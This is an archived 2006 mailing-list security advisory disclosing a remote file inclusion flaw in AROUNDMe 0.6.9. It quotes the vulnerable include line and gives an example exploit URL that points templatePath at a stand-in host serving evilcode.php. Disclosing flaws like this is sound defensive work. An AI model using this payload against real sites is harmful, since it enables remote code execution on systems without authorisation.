lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite for Android: free password hash cracker in your pocket
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <72874c990610221035o3bf9e9c2ma175f9fad2ab231b@mail.gmail.com>
Date: Sun, 22 Oct 2006 19:35:56 +0200
From: noislet.nospam@...il.com
To: bugtraq@...urityfocus.com, full-disclosure@...ts.grok.org.uk
Subject: AROUNDMe 0.6.9 remonte file inclusion

==============================================
 AROUNDMe 0.6.9 remonte file inclusion
 vendor site: http://barnraiser.org/
 vulnerable versions: 0.6.9 (and possibly older)

 discovered by: noislet  ( http://www.noislet.org/ )

 vendor informed: 21.10.2006
 published: 22.10.2006
 ==============================================

 product info:
 AROUNDMe is the perfect solution for you to bring people together
around shared goals, activities and interests to form a shared
knowledge network.

 ==============================================

 bug details:
 Input passed to the "$templatePath" is not verified before being used
to include files.

 required:
 register_globals = On

 file:
 pol_view.tpl.php (and others)

 buggy code:
 if (isset($poll)) {
 ...
 include $templatePath . "poll_detail.inc.tpl.php";

 ==============================================

 example exploitation:
 http://random.site/aroundme/template/barnraiser_01/pol_view.tpl.php?poll=1&templatePath=http://example.com/evilcode.php%00


 --
 noislet
    \ page http://www.noislet.org/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ